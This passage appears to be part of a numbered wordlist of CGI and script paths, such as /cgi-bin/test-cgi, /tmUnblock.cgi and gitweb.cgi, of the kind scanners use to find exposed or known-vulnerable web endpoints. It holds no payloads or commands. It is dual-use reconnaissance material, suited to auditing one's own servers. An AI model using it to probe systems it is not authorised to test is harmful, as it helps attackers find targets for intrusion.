240 | /cgi-bin/php4
241 | /cgi-bin/php5
242 | /cgi-bin/php5-cli
243 | /cgi-bin/ping.sh
244 | /cgi-bin/pollit/Poll_It_SSI_v2.0.cgi
245 | /cgi-bin/pollssi.cgi
246 | /cgi-bin/postcards.cgi
247 | /cgi-bin/powerup/r.cgi
248 | /cgi-bin/printenv
249 | /cgi-bin/probecontrol.cgi
250 | /cgi-bin/profile.cgi
251 | /cgi-bin/publisher/search.cgi
252 | /cgi-bin/quickstore.cgi
253 | /cgi-bin/quizme.cgi
254 | /cgi-bin/r.cgi
255 | /cgi-bin/ratlog.cgi
256 | /cgi-bin/recent.cgi
257 | /cgi-bin/register.cgi
258 | /cgi-bin/replicator/webpage.cgi/
259 | /cgi-bin/responder.cgi
260 | /cgi-bin/restore_config.cgi
261 | /cgi-bin/robadmin.cgi
262 | /cgi-bin/robpoll.cgi
263 | /cgi-bin/rtpd.cgi
264 | /cgi-bin/ruby.rb
265 | /cgi-bin/sat-ir-web.pl
266 | /cgi-bin/sbcgi/sitebuilder.cgi
267 | /cgi-bin/scoadminreg.cgi
268 | /cgi-bin/sdbsearch.cgi
269 | /cgi-bin/search
270 | /cgi-bin/search.cgi
271 | /cgi-bin/search/search.cgi
272 | /cgi-bin/sendform.cgi
273 | /cgi-bin/server.php
274 | /cgi-bin/shop.cgi
275 | /cgi-bin/shopper.cgi
276 | /cgi-bin/shopplus.cgi
277 | /cgi-bin/showcheckins.cgi
278 | /cgi-bin/simplestguest.cgi
279 | /cgi-bin/simplestmail.cgi
280 | /cgi-bin/smartsearch.cgi
281 | /cgi-bin/smartsearch/smartsearch.cgi
282 | /cgi-bin/snorkerz.bat
283 | /cgi-bin/snorkerz.cmd
284 | /cgi-bin/sojourn.cgi
285 | /cgi-bin/spin_client.cgi
286 | /cgi-bin/start.cgi
287 | /cgi-bin/status
288 | /cgi-bin/status_cgi
289 | /cgi-bin/status/status.cgi
290 | /cgi-bin/store.cgi
291 | /cgi-bin/store/agora.cgi
292 | /cgi-bin/store/index.cgi
293 | /cgi-bin/survey.cgi
294 | /cgi-bin/sync.cgi
295 | /cgi-bin/sysinfo.pl
296 | /cgi-bin/talkback.cgi
297 | /cgi-bin/technote/main.cgi
298 | /cgi-bin/test
299 | /cgi-bin/test-cgi
300 | /cgi-bin/test-cgi.pl
301 | /cgi-bin/test.cgi
302 | /cgi-bin/test.cgi.php
303 | /cgi-bin/test.cgi.pl
304 | /cgi-bin/test.py
305 | /cgi-bin/test.sh
306 | /cgi-bin/test/test.cgi
307 | /cgi-bin/test2.pl
308 | /cgi-bin/testing_whatever
309 | /cgi-bin/tidfinder.cgi
310 | /cgi-bin/tigvote.cgi
311 | /cgi-bin/title.cgi
312 | /cgi-bin/tools/tools.pl
313 | /cgi-bin/top.cgi
314 | /cgi-bin/traffic.cgi
315 | /cgi-bin/tree.php
316 | /cgi-bin/troops.cgi
317 | /cgi-bin/ttawebtop.cgi/
318 | /cgi-bin/ultraboard.cgi
319 | /cgi-bin/uname.cgi
320 | /cgi-bin/upload.cgi
321 | /cgi-bin/urlcount.cgi
322 | /cgi-bin/view_help.cgi
323 | /cgi-bin/viewcvs.cgi
324 | /cgi-bin/viralator.cgi
325 | /cgi-bin/virgil.cgi
326 | /cgi-bin/vote.cgi
327 | /cgi-bin/vpasswd.cgi
328 | /cgi-bin/w3mman2html.cgi
329 | /cgi-bin/way-board.cgi
330 | /cgi-bin/way-board/way-board.cgi
331 | /cgi-bin/Web_Store/web_store.cgi
332 | /cgi-bin/webbbs.cgi
333 | /cgi-bin/webcart/webcart.cgi
334 | /cgi-bin/webdist.cgi
335 | /cgi-bin/webif.cgi
336 | /cgi-bin/webmail/html/emumail.cgi
337 | /cgi-bin/webmap.cgi
338 | /cgi-bin/webspirs.cgi
339 | /cgi-bin/welcome
340 | /cgi-bin/whois_raw.cgi
341 | /cgi-bin/whois.cgi
342 | /cgi-bin/whois/whois.cgi
343 | /cgi-bin/wrap
344 | /cgi-bin/wrap.cgi
345 | /cgi-bin/wwwboard.cgi.cgi
346 | /cgi-bin/YaBB/YaBB.cgi
347 | /cgi-bin/zml.cgi
348 | /cgi-mod/index.cgi
349 | /cgi-sys/addalink.cgi
350 | /cgi-sys/defaultwebpage.cgi
351 | /cgi-sys/domainredirect.cgi
352 | /cgi-sys/entropybanner.cgi
353 | /cgi-sys/entropysearch.cgi
354 | /cgi-sys/FormMail-clone.cgi
355 | /cgi-sys/helpdesk.cgi
356 | /cgi-sys/mchat.cgi
357 | /cgi-sys/php5
358 | /cgi-sys/randhtml.cgi
359 | /cgi-sys/realhelpdesk.cgi
360 | /cgi-sys/realsignup.cgi
361 | /cgi-sys/signup.cgi
362 | /cgis/wwwboard/wwwboard.cgi
363 | /connector.cgi
364 | /cp/rac/nsManager.cgi
365 | /create_release.sh
366 | /CSNews.cgi
367 | /csPassword.cgi
368 | /dana-na/auth/url_default/welcome.cgi
369 | /dasdec/dasdec.csp
370 | /dcadmin.cgi
371 | /dcboard.cgi
372 | /dcforum.cgi
373 | /dcforum/dcforum.cgi
374 | /debuff.cgi
375 | /debug.cgi
376 | /details.cgi
377 | /edittag/edittag.cgi
378 | /emumail.cgi
379 | /enter_buff.cgi
380 | /enter_bug.cgi
381 | /ez2000/ezadmin.cgi
382 | /ez2000/ezboard.cgi
383 | /ez2000/ezman.cgi
384 | /fcgi-bin/echo
385 | /fcgi-bin/echo2
386 | /gitweb.cgi
387 | /gitweb/
388 | /gitweb/gitweb.cgi
389 | /Gozila.cgi
390 | /hitmatic/analyse.cgi
391 | /hp_docs/cgi-bin/index.cgi
392 | /html/cgi-bin/cgicso
393 | /index.cgi
394 | /index.php
395 | /index.pl
396 | /info.cgi
397 | /infosrch.cgi
398 | /login.cgi
399 | /login.php
400 | /login.pl
401 | /mailview.cgi
402 | /main.cgi
403 | /megabook/admin.cgi
404 | /ministats/admin.cgi
405 | /mods/apage/apage.cgi
406 | /musicqueue.cgi
407 | /ncbook.cgi
408 | /newpro.cgi
409 | /newsletter.sh
410 | /oem_webstage/cgi-bin/oemapp_cgi
411 | /page.cgi
412 | /parse_xml.cgi
413 | /photo/manage.cgi
414 | /photodata/manage.cgi
415 | /phppath/cgi_wrapper
416 | /phppath/php
417 | /print.cgi
418 | /process_buff.cgi
419 | /process_bug.cgi
420 | /pub/english.cgi
421 | /quikmail/nph-emumail.cgi
422 | /quikstore.cgi
423 | /reviews/newpro.cgi
424 | /ROADS/cgi-bin/search.pl
425 | /sample01.cgi
426 | /sample02.cgi
427 | /sample03.cgi
428 | /sample04.cgi
429 | /sampleposteddata.cgi
430 | /scancfg.cgi
431 | /servers/link.cgi
432 | /setpasswd.cgi
433 | /SetSecurity.shm
434 | /shop/member_html.cgi
435 | /shop/normal_html.cgi
436 | /site_searcher.cgi
437 | /siteUserMod.cgi
438 | /status
439 | /submit.cgi
440 | /sys-cgi
441 | /technote/print.cgi
442 | /template.cgi
443 | /test_cgi.php
444 | /test_cgi.pl
445 | /test.cgi
446 | /test.cgi.php
447 | /test.cgi.pl
448 | /tmUnblock.cgi
449 | /ucsm/isSamInstalled.cgi
450 | /upload.cgi
451 | /userreg.cgi
452 | /users/scripts/submit.cgi
453 | /vood/cgi-bin/vood_view.cgi
454 | /Web_Store/web_store.cgi
455 | /webtools/bonsai/ccvsblame.cgi
456 | /webtools/bonsai/cvsblame.cgi
457 | /webtools/bonsai/cvslog.cgi
458 | /webtools/bonsai/cvsquery.cgi
459 | /webtools/bonsai/cvsqueryform.cgi
460 | /webtools/bonsai/showcheckins.cgi
461 | /wwwadmin.cgi
462 | /wwwboard.cgi
463 | /wwwboard/wwwboard.cgi
464 | /xul/
465 | /cgi-bin/modules.cgi
466 | /cgi-bin/login.sh
467 | /cgi-bin/wxis.exe/opac/?IsisScript=opac/opac.xis
--------------------------------------------------------------------------------